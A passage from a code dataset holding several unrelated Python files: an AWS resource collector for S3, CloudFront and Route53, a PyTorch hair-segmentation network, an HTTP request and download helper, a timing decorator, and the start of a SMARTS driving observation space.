ConfigOption('cloudfront_collection', True, 'bool', 'Enable Cloudfront DNS Collection'),\n ConfigOption('route53_collection', True, 'bool', 'Enable Route53 DNS Collection'),\n )\n\n def __init__(self, account):\n super().__init__()\n\n if type(account) == str:\n account = AWSAccount.get(account)\n\n if not isinstance(account, AWSAccount):\n raise InquisitorError('The AWS Collector only supports AWS Accounts, got {}'.format(\n account.__class__.__name__\n ))\n\n self.account = account\n self.session = get_aws_session(self.account)\n\n def run(self):\n try:\n if self.s3_collection_enabled:\n self.update_s3buckets()\n\n if self.cloudfront_collection_enabled:\n self.update_cloudfront()\n\n if self.route53_collection_enabled:\n self.update_route53()\n\n except Exception as ex:\n self.log.exception(ex)\n raise\n\n finally:\n del self.session\n\n @retry\n def update_s3buckets(self):\n \"\"\"Update list of S3 Buckets for the account\n\n Returns:\n `None`\n \"\"\"\n self.log.debug('Updating S3Buckets for {}'.format(self.account.account_name))\n s3 = self.session.resource('s3')\n s3c = self.session.client('s3')\n\n try:\n existing_buckets = S3Bucket.get_all(self.account)\n buckets = {bucket.name: bucket for bucket in s3.buckets.all()}\n for data in buckets.values():\n # This section ensures that we handle non-existent or non-accessible sub-resources\n try:\n bucket_region = s3c.get_bucket_location(Bucket=data.name)['LocationConstraint']\n if not bucket_region:\n bucket_region = 'us-east-1'\n\n except ClientError as e:\n self.log.info('Could not get bucket location..bucket possibly removed / {}'.format(e))\n bucket_region = 'unavailable'\n\n try:\n bucket_policy = data.Policy().policy\n\n except ClientError as e:\n if e.response['Error']['Code'] == 'NoSuchBucketPolicy':\n bucket_policy = None\n else:\n self.log.info('There was a problem collecting bucket policy for bucket {} on account {}, {}'\n .format(data.name, self.account, e.response))\n bucket_policy = 'cinq cannot poll'\n\n try:\n website_enabled = 'Enabled' if data.Website().index_document else 'Disabled'\n\n except ClientError as e:\n if e.response['Error']['Code'] == 'NoSuchWebsiteConfiguration':\n website_enabled = 'Disabled'\n else:\n self.log.info('There was a problem collecting website config for bucket {} on account {}'\n .format(data.name, 
self.account))\n website_enabled = 'cinq cannot poll'\n\n try:\n tags = {t['Key']: t['Value'] for t in data.Tagging().tag_set}\n\n except ClientError:\n tags = {}\n\n try:\n bucket_size = self._get_bucket_statistics(data.name, bucket_region, 'StandardStorage',\n 'BucketSizeBytes', 3)\n\n bucket_obj_count = self._get_bucket_statistics(data.name, bucket_region, 'AllStorageTypes',\n 'NumberOfObjects', 3)\n\n metrics = {'size': bucket_size, 'object_count': bucket_obj_count}\n\n except Exception as e:\n self.log.info('Could not retrieve bucket statistics / {}'.format(e))\n metrics = {'found': False}\n\n properties = {\n 'bucket_policy': bucket_policy,\n 'creation_date': data.creation_date,\n 'location': bucket_region,\n 'website_enabled': website_enabled,\n 'metrics': metrics,\n 'tags': tags\n }\n\n if data.name in existing_buckets:\n bucket = existing_buckets[data.name]\n if bucket.update(data, properties):\n self.log.debug('Change detected for S3Bucket {}/{}'.format(\n self.account.account_name,\n bucket.id\n ))\n bucket.save()\n else:\n # If a bucket has no tags, a boto3 error is thrown. We treat this as an empty tag set\n\n S3Bucket.create(\n data.name,\n account_id=self.account.account_id,\n properties=properties,\n location=bucket_region,\n tags=tags\n )\n self.log.debug('Added new S3Bucket {}/{}'.format(\n self.account.account_name,\n data.name\n ))\n db.session.commit()\n\n bk = set(list(buckets.keys()))\n ebk = set(list(existing_buckets.keys()))\n\n try:\n for resource_id in ebk - bk:\n db.session.delete(existing_buckets[resource_id].resource)\n self.log.debug('Deleted S3Bucket {}/{}'.format(\n self.account.account_name,\n resource_id\n ))\n db.session.commit()\n\n except Exception as e:\n self.log.error(\n 'Could not update the current S3Bucket list for account {}/{}'.format(self.account.account_name, e))\n db.session.rollback()\n\n finally:\n del s3, s3c\n\n @retry\n def update_cloudfront(self):\n \"\"\"Update list of CloudFront Distributions for the account\n\n Returns:\n `None`\n \"\"\"\n self.log.debug('Updating CloudFront distributions for {}'.format(self.account.account_name))\n cfr = self.session.client('cloudfront')\n\n try:\n existing_dists = CloudFrontDist.get_all(self.account, None)\n dists = []\n\n # region Fetch information from API\n # region Web distributions\n done = False\n marker = None\n while not done:\n if marker:\n response = cfr.list_distributions(Marker=marker)\n else:\n response = cfr.list_distributions()\n\n dl = response['DistributionList']\n if dl['IsTruncated']:\n marker = dl['NextMarker']\n else:\n done = True\n\n if 'Items' in dl:\n for dist in dl['Items']:\n origins = []\n for origin in dist['Origins']['Items']:\n if 'S3OriginConfig' in origin:\n origins.append(\n {\n 'type': 's3',\n 'source': origin['DomainName']\n }\n )\n elif 'CustomOriginConfig' in origin:\n origins.append(\n {\n 'type': 'custom-http',\n 'source': origin['DomainName']\n }\n )\n\n data = {\n 'arn': dist['ARN'],\n 'name': dist['DomainName'],\n 'origins': origins,\n 'enabled': dist['Enabled'],\n 'type': 'web',\n 'tags': self.__get_distribution_tags(cfr, dist['ARN'])\n }\n dists.append(data)\n # endregion\n\n # region Streaming distributions\n done = False\n marker = None\n while not done:\n if marker:\n response = cfr.list_streaming_distributions(Marker=marker)\n else:\n response = cfr.list_streaming_distributions()\n\n dl = response['StreamingDistributionList']\n if dl['IsTruncated']:\n marker = dl['NextMarker']\n else:\n done = True\n\n if 'Items' in dl:\n dists += [\n {\n 'arn': 
x['ARN'],\n 'name': x['DomainName'],\n 'origins': [{'type': 's3', 'source': x['S3Origin']['DomainName']}],\n 'enabled': x['Enabled'],\n 'type': 'rtmp',\n 'tags': self.__get_distribution_tags(cfr, x['ARN'])\n } for x in dl['Items']\n ]\n # endregion\n # endregion\n\n for data in dists:\n if data['arn'] in existing_dists:\n dist = existing_dists[data['arn']]\n if dist.update(data):\n self.log.debug('Updated CloudFrontDist {}/{}'.format(\n self.account.account_name,\n data['name']\n ))\n dist.save()\n\n else:\n properties = {\n 'domain_name': data['name'],\n 'origins': data['origins'],\n 'enabled': data['enabled'],\n 'type': data['type']\n }\n\n CloudFrontDist.create(\n data['arn'],\n account_id=self.account.account_id,\n properties=properties,\n tags=data['tags']\n )\n\n self.log.debug('Added new CloudFrontDist {}/{}'.format(\n self.account.account_name,\n data['name']\n ))\n db.session.commit()\n\n dk = set(x['arn'] for x in dists)\n edk = set(existing_dists.keys())\n\n try:\n for resource_id in edk - dk:\n db.session.delete(existing_dists[resource_id].resource)\n self.log.debug('Deleted CloudFrontDist {}/{}'.format(\n resource_id,\n self.account.account_name\n ))\n db.session.commit()\n except:\n db.session.rollback()\n finally:\n del cfr\n\n @retry\n def update_route53(self):\n \"\"\"Update list of Route53 DNS Zones and their records for the account\n\n Returns:\n `None`\n \"\"\"\n self.log.debug('Updating Route53 information for {}'.format(self.account))\n\n # region Update zones\n existing_zones = DNSZone.get_all(self.account)\n zones = self.__fetch_route53_zones()\n for resource_id, data in zones.items():\n if resource_id in existing_zones:\n zone = DNSZone.get(resource_id)\n if zone.update(data):\n self.log.debug('Change detected for Route53 zone {}/{}'.format(\n self.account,\n zone.name\n ))\n zone.save()\n else:\n tags = data.pop('tags')\n DNSZone.create(\n resource_id,\n account_id=self.account.account_id,\n properties=data,\n tags=tags\n )\n\n self.log.debug('Added Route53 zone {}/{}'.format(\n self.account,\n data['name']\n ))\n\n db.session.commit()\n\n zk = set(zones.keys())\n ezk = set(existing_zones.keys())\n\n for resource_id in ezk - zk:\n zone = existing_zones[resource_id]\n\n db.session.delete(zone.resource)\n self.log.debug('Deleted Route53 zone {}/{}'.format(\n self.account.account_name,\n zone.name.value\n ))\n db.session.commit()\n # endregion\n\n # region Update resource records\n try:\n for zone_id, zone in DNSZone.get_all(self.account).items():\n existing_records = {rec.id: rec for rec in zone.records}\n records = self.__fetch_route53_zone_records(zone.get_property('zone_id').value)\n\n for data in records:\n if data['id'] in existing_records:\n record = existing_records[data['id']]\n if record.update(data):\n self.log.debug('Changed detected for DNSRecord {}/{}/{}'.format(\n self.account,\n zone.name,\n data['name']\n ))\n record.save()\n else:\n record = DNSRecord.create(\n data['id'],\n account_id=self.account.account_id,\n properties={k: v for k, v in data.items() if k != 'id'},\n tags={}\n )\n self.log.debug('Added new DNSRecord {}/{}/{}'.format(\n self.account,\n zone.name,\n data['name']\n ))\n zone.add_record(record)\n db.session.commit()\n\n rk = set(x['id'] for x in records)\n erk = set(existing_records.keys())\n\n for resource_id in erk - rk:\n record = existing_records[resource_id]\n zone.delete_record(record)\n self.log.debug('Deleted Route53 record {}/{}/{}'.format(\n self.account.account_name,\n zone_id,\n record.name\n ))\n db.session.commit()\n 
except:\n raise\n # endregion\n\n # region Helper functions\n @retry\n def __get_distribution_tags(self, client, arn):\n \"\"\"Returns a dict containing the tags for a CloudFront distribution\n\n Args:\n client (botocore.client.CloudFront): Boto3 CloudFront client object\n arn (str): ARN of the distribution to get tags for\n\n Returns:\n `dict`\n \"\"\"\n return {\n t['Key']: t['Value'] for t in client.list_tags_for_resource(\n Resource=arn\n )['Tags']['Items']\n }\n\n @retry\n def __fetch_route53_zones(self):\n \"\"\"Return a list of all DNS zones hosted in Route53\n\n Returns:\n :obj:`list` of `dict`\n \"\"\"\n done = False\n marker = None\n zones = {}\n route53 = self.session.client('route53')\n\n try:\n while not done:\n if marker:\n response = route53.list_hosted_zones(Marker=marker)\n else:\n response = route53.list_hosted_zones()\n\n if response['IsTruncated']:\n marker = response['NextMarker']\n else:\n done = True\n\n for zone_data in response['HostedZones']:\n zones[get_resource_id('r53z', zone_data['Id'])] = {\n 'name': zone_data['Name'].rstrip('.'),\n 'source': 'AWS/{}'.format(self.account),\n 'comment': zone_data['Config']['Comment'] if 'Comment' in zone_data['Config'] else None,\n 'zone_id': zone_data['Id'],\n 'private_zone': zone_data['Config']['PrivateZone'],\n 'tags': self.__fetch_route53_zone_tags(zone_data['Id'])\n }\n\n return zones\n finally:\n del route53\n\n @retry\n def __fetch_route53_zone_records(self, zone_id):\n \"\"\"Return all resource records for a specific Route53 zone\n\n Args:\n zone_id (`str`): Name / ID of the hosted zone\n\n Returns:\n `dict`\n \"\"\"\n route53 = self.session.client('route53')\n\n done = False\n nextName = nextType = None\n records = {}\n\n try:\n while not done:\n if nextName and nextType:\n response = route53.list_resource_record_sets(\n HostedZoneId=zone_id,\n StartRecordName=nextName,\n StartRecordType=nextType\n )\n else:\n response = route53.list_resource_record_sets(HostedZoneId=zone_id)\n\n if response['IsTruncated']:\n nextName = response['NextRecordName']\n nextType = response['NextRecordType']\n else:\n done = True\n\n if 'ResourceRecordSets' in response:\n for record in response['ResourceRecordSets']:\n # Cannot make this a list, due to a race-condition in the AWS api that might return the same\n # record more than once, so we use a dict instead to ensure that if we get duplicate records\n # we simply just overwrite the one already there with the same info.\n record_id = self._get_resource_hash(zone_id, record)\n if 'AliasTarget' in record:\n value = record['AliasTarget']['DNSName']\n records[record_id] = {\n 'id': record_id,\n 'name': record['Name'].rstrip('.'),\n 'type': 'ALIAS',\n 'ttl': 0,\n 'value': [value]\n }\n else:\n value = [y['Value'] for y in record['ResourceRecords']]\n records[record_id] = {\n 'id': record_id,\n 'name': record['Name'].rstrip('.'),\n 'type': record['Type'],\n 'ttl': record['TTL'],\n 'value': value\n }\n\n return list(records.values())\n finally:\n del route53\n\n @retry\n def __fetch_route53_zone_tags(self, zone_id):\n \"\"\"Return a dict with the tags for the zone\n\n Args:\n zone_id (`str`): ID of the hosted zone\n\n Returns:\n :obj:`dict` of `str`: `str`\n \"\"\"\n route53 = self.session.client('route53')\n\n try:\n return {\n tag['Key']: tag['Value'] for tag in\n route53.list_tags_for_resource(\n ResourceType='hostedzone',\n ResourceId=zone_id.split('/')[-1]\n )['ResourceTagSet']['Tags']\n }\n finally:\n del route53\n\n @staticmethod\n def _get_resource_hash(zone_name, record):\n 
\"\"\"Returns the last ten digits of the sha256 hash of the combined arguments. Useful for generating unique\n resource IDs\n\n Args:\n zone_name (`str`): The name of the DNS Zone the record belongs to\n record (`dict`): A record dict to generate the hash from\n\n Returns:\n `str`\n \"\"\"\n record_data = defaultdict(int, record)\n if type(record_data['GeoLocation']) == dict:\n record_data['GeoLocation'] = \":\".join([\"{}={}\".format(k, v) for k, v in record_data['GeoLocation'].items()])\n\n args = [\n zone_name,\n record_data['Name'],\n record_data['Type'],\n record_data['Weight'],\n record_data['Region'],\n record_data['GeoLocation'],\n record_data['Failover'],\n record_data['HealthCheckId'],\n record_data['TrafficPolicyInstanceId']\n ]\n\n return get_resource_id('r53r', args)\n\n def _get_bucket_statistics(self, bucket_name, bucket_region, storage_type, statistic, days):\n \"\"\" Returns datapoints from cloudwatch for bucket statistics.\n\n Args:\n bucket_name `(str)`: The name of the bucket\n statistic `(str)`: The statistic you want to fetch from\n days `(int)`: Sample period for the statistic\n\n \"\"\"\n\n cw = self.session.client('cloudwatch', region_name=bucket_region)\n\n # gather cw stats\n\n try:\n obj_stats = cw.get_metric_statistics(\n Namespace='AWS/S3',\n MetricName=statistic,\n Dimensions=[\n {\n 'Name': 'StorageType',\n 'Value': storage_type\n },\n {\n 'Name': 'BucketName',\n 'Value': bucket_name\n }\n ],\n Period=86400,\n StartTime=datetime.utcnow() - timedelta(days=days),\n EndTime=datetime.utcnow(),\n Statistics=[\n 'Average'\n ]\n )\n stat_value = obj_stats['Datapoints'][0]['Average'] if obj_stats['Datapoints'] else 'NO_DATA'\n\n return stat_value\n\n except Exception as e:\n self.log.error(\n 'Could not get bucket statistic for account {} / bucket {} / {}'.format(self.account.account_name,\n bucket_name, e))\n\n finally:\n del cw\n\n # endregion\n","repo_name":"RiotGames/cloud-inquisitor","sub_path":"plugins/public/cinq-collector-aws/cinq_collector_aws/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":23738,"program_lang":"python","lang":"en","doc_type":"code","stars":453,"dataset":"github-code","pt":"3"}
+{"seq_id":"30792559765","text":"import torch\r\nimport torch.nn as nn\r\n\r\nclass conv_start(nn.Module):\r\n def __init__(self,in_channels, out_channels):\r\n super(conv_start, self).__init__()\r\n self.conv = nn.Conv2d(in_channels,out_channels,kernel_size=3, stride= 2, padding=1)\r\n\r\n def forward(self,x):\r\n x=self.conv(x)\r\n return x\r\n\r\n\r\nclass encode_depthwise(nn.Module):\r\n def __init__(self,in_channels, out_channels,stride):\r\n super(encode_depthwise,self).__init__()\r\n self.conv = nn.Sequential(\r\n nn.Conv2d(in_channels,in_channels,3, stride, padding=1, groups=in_channels),\r\n nn.BatchNorm2d(in_channels),\r\n nn.ReLU(),\r\n nn.Conv2d(in_channels,out_channels,1, 1, 0),\r\n nn.BatchNorm2d(out_channels),\r\n nn.ReLU()\r\n )\r\n\r\n def forward(self,x):\r\n x= self.conv(x)\r\n return x\r\n\r\n\r\nclass decode_depthwise(nn.Module):\r\n def __init__(self,in_channels, out_channels):\r\n super(decode_depthwise,self).__init__()\r\n self.conv = nn.Sequential(\r\n nn.Conv2d(in_channels, in_channels, 3, 1, padding= 1, groups=in_channels),\r\n nn.Conv2d(in_channels, out_channels,1, 1, padding=0, groups=1),\r\n nn.ReLU()\r\n )\r\n\r\n def forward(self,x):\r\n x= self.conv(x)\r\n return x\r\n\r\n\r\nclass up_skip(nn.Module):\r\n def __init__(self,in_channels, out_channels):\r\n super(up_skip, self).__init__()\r\n self.up = nn.Upsample(scale_factor=2)\r\n self.conv = nn.Conv2d(in_channels, out_channels, 1, 1, 0) # stride랑 padding 값 궁금??\r\n\r\n def forward(self,x1,x2):\r\n x1 = self.up(x1)\r\n x2 = self.conv(x2)\r\n x = torch.add(x1, x2)\r\n return x\r\n\r\n\r\nclass conv_softmax(nn.Module):\r\n def __init__(self,in_channels,out_channels):\r\n super(conv_softmax, self).__init__()\r\n self.conv = nn.Sequential(\r\n nn.Conv2d(in_channels,out_channels, kernel_size=1, stride=1),\r\n\r\n )\r\n\r\n def forward(self, x):\r\n x = self.conv(x)\r\n return x\r\n\r\n\r\nclass Mobilehair(nn.Module):\r\n def __init__(self):\r\n super(Mobilehair, self).__init__()\r\n\r\n self.inc = conv_start(3,32)\r\n self.edw1 = encode_depthwise(32, 64, 1)\r\n self.edw2 = encode_depthwise(64, 128, 2)\r\n self.edw3 = encode_depthwise(128, 128, 1)\r\n self.edw4 = encode_depthwise(128, 256, 2)\r\n self.edw5 = encode_depthwise(256, 256, 1)\r\n self.edw6 = encode_depthwise(256, 512, 2)\r\n self.edw7 = encode_depthwise(512, 512, 1)\r\n self.edw8 = encode_depthwise(512, 512, 1)\r\n self.edw9 = encode_depthwise(512, 512, 1)\r\n self.edw10 = encode_depthwise(512, 512, 1)\r\n self.edw11 = encode_depthwise(512, 512, 1)\r\n self.edw12 = encode_depthwise(512, 1024, 2)\r\n self.edw13 = encode_depthwise(1024, 1024, 1)\r\n\r\n\r\n self.up1 = up_skip(512,1024)\r\n self.ddw1 = decode_depthwise(1024, 64)\r\n self.up2 = up_skip(256,64)\r\n self.ddw2 = decode_depthwise(64,64)\r\n self.up3 = up_skip(128,64)\r\n self.ddw3 = decode_depthwise(64, 64)\r\n self.up4 = up_skip(64,64)\r\n self.ddw4 = decode_depthwise(64, 64)\r\n self.up5 = nn.Upsample(scale_factor=2)\r\n self.ddw5 = decode_depthwise(64, 64)\r\n self.lac = conv_softmax(64,2)\r\n\r\n def forward(self, x):\r\n x1 = self.inc(x)\r\n x2 = self.edw1(x1)\r\n x3 = self.edw2(x2)\r\n x4 = self.edw3(x3)\r\n x5 = self.edw4(x4)\r\n x6 = self.edw5(x5)\r\n x7 = self.edw6(x6)\r\n x8 = self.edw7(x7)\r\n x9 = self.edw8(x8)\r\n x10 = self.edw9(x9)\r\n x11 = self.edw10(x10)\r\n x12 = self.edw11(x11)\r\n x13 = self.edw12(x12)\r\n x14 = self.edw13(x13)\r\n\r\n x = self.up1(x14,x12)\r\n x = self.ddw1(x)\r\n x = self.up2(x,x6)\r\n x = self.ddw2(x)\r\n x = self.up3(x,x4)\r\n x = self.ddw3(x)\r\n x = 
self.up4(x,x2)\r\n x = self.ddw4(x)\r\n x = self.up5(x)\r\n x = self.ddw5(x)\r\n x = self.lac(x)\r\n\r\n return x\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"prography/hair-color","sub_path":"Hong/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4104,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
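encode_depthwise in the record above is the standard MobileNet-style depthwise-separable block: a 3x3 convolution with groups=in_channels (one filter per channel) followed by a 1x1 pointwise convolution that mixes channels. A minimal sketch checking its shape contract, assuming PyTorch is available (the values mirror the record's encode_depthwise(64, 128, 2)):

import torch
import torch.nn as nn

# Depthwise 3x3 (groups=in_channels) + pointwise 1x1, as in encode_depthwise(64, 128, 2).
block = nn.Sequential(
    nn.Conv2d(64, 64, 3, 2, padding=1, groups=64),   # depthwise, stride 2
    nn.BatchNorm2d(64),
    nn.ReLU(),
    nn.Conv2d(64, 128, 1, 1, 0),                     # pointwise channel mixing
    nn.BatchNorm2d(128),
    nn.ReLU(),
)

y = block(torch.randn(1, 64, 112, 112))
print(y.shape)  # torch.Size([1, 128, 56, 56]) -- stride 2 halves H and W

The payoff is parameter count: this pair costs 64*3*3 + 64*128 = 8768 conv weights, versus 64*128*3*3 = 73728 for a plain 3x3 convolution with the same in/out channels.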
+{"seq_id":"28061951523","text":"import os\nimport random\nimport sys\nimport time\nimport urllib.error\nimport urllib.parse\nimport urllib.request\nimport urllib.response\n\nimport chardet\nimport requests\nimport urllib3\n\n\nclass HttpRequestBase:\n def __init__(self, params=None, headers=None, timeout=200, retries=20, redirect=False, proxys=None):\n self.__agent = [\n 'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11',\n 'Opera/9.25 (Windows NT 5.1; U; en)',\n 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',\n 'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',\n 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.12) Gecko/20070731 Ubuntu/dapper-security Firefox/1.5.0.12',\n 'Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/1.2.9',\n \"Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:10.0) Gecko/20100101 Firefox/10.0 \",\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0)',\n 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36',\n ]\n if headers is not None:\n self.__headers = headers\n else:\n self.__headers = {\n 'User-Agent': random.choice(self.__agent)\n }\n self.timeout = timeout\n self.retries = retries\n self.redirect = redirect\n self.param = params\n self.proxys = proxys\n\n def requests_request(self, method, url, codec=False, data=None):\n try:\n res = requests.request(method, url=url, params=self.param, data=data, headers=self.__headers,\n timeout=self.timeout, allow_redirects=self.redirect, proxies=self.proxys)\n if res.status_code == 200:\n content = res.content\n code = chardet.detect(content)[\"encoding\"]\n del content\n if code is not None:\n if codec:\n res.encoding = 'gbk'\n else:\n res.encoding = code\n text = res.text\n res.close()\n del res\n return text\n else:\n res.encoding = \"utf-8\"\n text = res.text\n res.close()\n del res\n return text\n elif res.status_code == 404 or res.status_code == 500 or res.status_code == 403 or res.status_code == 521:\n page = self.__retry_method(\"requests\", method, url)\n if page != \"\":\n return page\n else:\n return None\n else:\n return \"\"\n except requests.ConnectTimeout or requests.exceptions.ReadTimeout:\n page = self.__retry_method(\"requests\", method, url)\n if page != \"\":\n return page\n else:\n return \"\"\n except requests.ConnectionError:\n page = self.__retry_method(\"requests\", method, url)\n if page != \"\":\n return page\n else:\n return \"\"\n\n def urllib_request(self, method, url, data=None):\n content = ''\n try:\n if data is not None:\n request_data = urllib.parse.urlencode(data)\n http = urllib.request.Request(url, data=request_data, headers=self.__headers, method=method)\n else:\n http = urllib.request.Request(url, headers=self.__headers, method=method)\n req = urllib.request.urlopen(http)\n\n if req.status == 200:\n content = req.read()\n code = chardet.detect(content)[\"encoding\"]\n if code is not None:\n\n return str(content, encoding=code)\n else:\n return str(content, encoding=\"utf-8\")\n elif req.status == 403 or req.status == 404 or req.status == 500:\n page = self.__retry_method(\"urllib\", method, url)\n if page != \"\":\n return page\n else:\n return None\n else:\n return \"\"\n except urllib.error.HTTPError:\n page = self.__retry_method(\"urllib\", method, url)\n if page != \"\":\n return page\n else:\n return \"\"\n except urllib.error.URLError:\n page = self.__retry_method(\"urllib\", method, url)\n if page != 
\"\":\n return page\n else:\n return \"\"\n except UnicodeDecodeError:\n return str(content, encoding=\"GB18030\", errors='ignore')\n\n def urllib3_request(self, method, url, data=None):\n content = ''\n try:\n http = urllib3.PoolManager(timeout=self.timeout,\n retries=urllib3.Retry(self.retries, redirect=self.redirect))\n if data is not None:\n res = http.request_encode_body(method, url, fields=data, headers=self.__headers)\n elif self.param is not None:\n res = http.request_encode_url(method, url, fields=self.param, headers=self.__headers)\n else:\n res = http.request(method, url, headers=self.__headers, )\n if res.status == 200:\n content = res.data\n code = chardet.detect(content)[\"encoding\"]\n if code is not None:\n return str(content, encoding=code)\n else:\n return str(content, encoding=\"utf-8\")\n elif res.status == 403 or res.status == 404 or res.status == 500:\n page = self.__retry_method(\"urllib3\", method, url)\n if page != \"\":\n return page\n else:\n return None\n else:\n return \"\"\n except urllib3.exceptions.ConnectionError:\n page = self.__retry_method(\"urllib3\", method, url)\n if page != \"\":\n return page\n else:\n return \"\"\n except urllib3.exceptions.HTTPError:\n page = self.__retry_method(\"urllib3\", method, url)\n if page != \"\":\n return page\n else:\n return \"\"\n except urllib3.exceptions.ConnectTimeoutError:\n page = self.__retry_method(\"urllib3\", method, url)\n if page != \"\":\n return page\n else:\n return \"\"\n except urllib3.exceptions.RequestError:\n page = self.__retry_method(\"urllib3\", method, url)\n if page != \"\":\n return page\n else:\n return \"\"\n except UnicodeDecodeError:\n return str(content, encoding=\"GB18030\", errors='ignore')\n\n def __retry_method(self, old_method, method, url):\n sys.stdout.write(\"Retrying...\")\n if old_method == \"urllib\":\n page = self.urllib3_request(method, url)\n if page is not None and page != \"\":\n return page\n elif page is None:\n if method == \"POST\":\n return self.urllib3_request(\"GET\", url)\n elif method == \"GET\":\n return self.urllib3_request(\"POST\", url)\n else:\n return \"\"\n else:\n return \"\"\n elif old_method == \"urllib3\":\n page = self.requests_request(method, url)\n if page is not None and page != \"\":\n return page\n elif page is None:\n if method == \"POST\":\n return self.requests_request(\"GET\", url)\n elif method == \"GET\":\n return self.requests_request(\"POST\", url)\n else:\n return \"\"\n else:\n return \"\"\n if old_method == \"requests\":\n page = self.urllib_request(method, url)\n if page is not None and page != \"\":\n return page\n elif page is None:\n if method == \"POST\":\n return self.urllib_request(\"GET\", url)\n elif method == \"GET\":\n return self.urllib_request(\"POST\", url)\n else:\n return \"\"\n else:\n return \"\"\n\n @staticmethod\n def file_upload(path, url):\n file_size = os.path.getsize(path)\n file_name = os.path.split(path)[1]\n block_size = 10 * 1024 * 1024\n block_count = int(file_size / block_size)\n with open(path, \"rb\") as f:\n for index in range(block_count):\n if index == block_count - 1:\n block_size = file_size - index * block_size\n block = f.read(block_size)\n blob = {\n \"name\": file_name,\n \"index\": index\n }\n response = requests.post(url, data=blob, files={\"file\": block})\n if response.status_code == 200:\n print(response.text)\n else:\n break\n\n @staticmethod\n def url_download(path, url, show_progress=True):\n start = round(time.time(), 2)\n\n def format_time(second):\n second = int(second)\n str_format = 
\"{seconds}s\".format(seconds=second)\n if second // 60 > 0:\n minutes = round(second // 60)\n seconds = second - minutes * 60\n str_format = \"{minutes}m{seconds}s\".format(minutes=minutes, seconds=seconds)\n if second // 3600 > 0:\n hour = round(second // 3600)\n minutes = round((second - hour * 3600) // 60)\n seconds = second - minutes * 60 - hour * 3600\n str_format = \"{hour}h{minutes}m{seconds}s\".format(hour=hour, minutes=minutes, seconds=seconds)\n return str_format\n\n def download_reporter(blob_nums, blob_size, file_size):\n per = 100.0 * blob_nums * blob_size / file_size\n if per > 100:\n per = 100\n already_use = round(time.time(), 2) - start\n predict_use = round(already_use / (blob_nums + 1) * (file_size / blob_size - blob_nums + 1), 2)\n speed = round(8 * (blob_nums + 1) / already_use, 2)\n speed_str = str(speed) + \"KB/s\"\n if speed // 1024 > 0:\n speed = round(speed / 1024, 2)\n speed_str = str(speed) + \"MB/s\"\n if show_progress:\n sys.stdout.write(\"\\r\" + \"已下载:%.3f%%,已用时:%s,etc:%s,speed:%s\" % (\n per, format_time(already_use), format_time(predict_use), speed_str))\n del already_use, predict_use, speed, speed_str\n\n try:\n path = urllib.request.urlretrieve(url, path, reporthook=download_reporter)\n return path is not None\n except (urllib.error.HTTPError, urllib.error.URLError) as e:\n print(e)\n return HttpRequestBase.url_download(path, url, show_progress=False)\n except ValueError as e:\n print(e)\n except urllib.error.ContentTooShortError:\n return HttpRequestBase.url_download(path, url, show_progress=False)\n","repo_name":"CSNight/MMC-Services","sub_path":"server_utils/HttpRequestBase.py","file_name":"HttpRequestBase.py","file_ext":"py","file_size_in_byte":11531,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"}
+{"seq_id":"25853916136","text":"import time\n\ndef calculate_time(func):\n def wrapper_function(*args,**kwargs):\n print(f'executing .... square finder')\n t1= time.time()\n returned_value = func(*args,**kwargs)\n t2= time.time()\n total = t2-t1\n print(f\"time --> {total} sec\")\n return returned_value\n return wrapper_function\n\n@calculate_time\ndef add(a):\n l = [i**10 for i in range(1,a+1)]\n \n \nprint(add(1000))\n\n","repo_name":"mihirverma7781/Python-Scripts","sub_path":"chap14/ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"73284582161","text":"\"\"\"\nthis file contains tuned obs function and reward function\nfix ttc calculate\n\"\"\"\nimport math\n\nimport gym\nimport numpy as np\n\nfrom smarts.core.agent import AgentSpec\nfrom smarts.core.agent_interface import AgentInterface\nfrom smarts.core.agent_interface import OGM, NeighborhoodVehicles\nfrom smarts.core.controllers import ActionSpaceType\nfrom shapely.geometry import LineString\n\nfrom matplotlib.path import Path\n\nMAX_LANES = 5 # The maximum number of lanes we expect to see in any scenario.\nlane_crash_flag = False # used for training to signal a flipped car\nintersection_crash_flag = False # used for training to signal intersect crash\nglobal_max_len_lane_index = 0\nglobal_max_len_lane = 51\nglobal_lane_ttc = 1.\nglobal_in_genJ = False\nglobal_sample_wp_path = None\nglobal_int_in_gneJ = False\nglobal_last_len_wps_len = 1\nthreaten_distance = 1.\nhead_threaten_distance = 1.\nteal_threaten_distance = 1.\n\n# ==================================================\n# Continous Action Space\n# throttle, brake, steering\n# ==================================================\n\nACTION_SPACE = gym.spaces.Box(\n low=np.array([-1.0, -1.0]), high=np.array([1.0, 1.0]), dtype=np.float32\n)\n\n# ==================================================\n# Observation Space\n# This observation space should match the output of observation(..) below\n# ==================================================\nOBSERVATION_SPACE = gym.spaces.Dict(\n {\n # To make car follow the waypoints\n # distance from lane center\n \"distance_from_center\": gym.spaces.Box(low=-1e10, high=1e10, shape=(1,)),\n # relative heading angle from 10 waypoints in 50 forehead waypoints\n \"heading_errors\": gym.spaces.Box(low=-1.0, high=1.0, shape=(10,)),\n\n \"wp_errors\": gym.spaces.Box(low=-1e10, high=1e10, shape=(4,)),\n \"wp_speed_penalty\": gym.spaces.Box(low=-1e10, high=1e10, shape=(1,)),\n # Car attributes\n # ego speed\n \"speed\": gym.spaces.Box(low=-1e10, high=1e10, shape=(1,)),\n # ego steering\n \"steering\": gym.spaces.Box(low=-1e10, high=1e10, 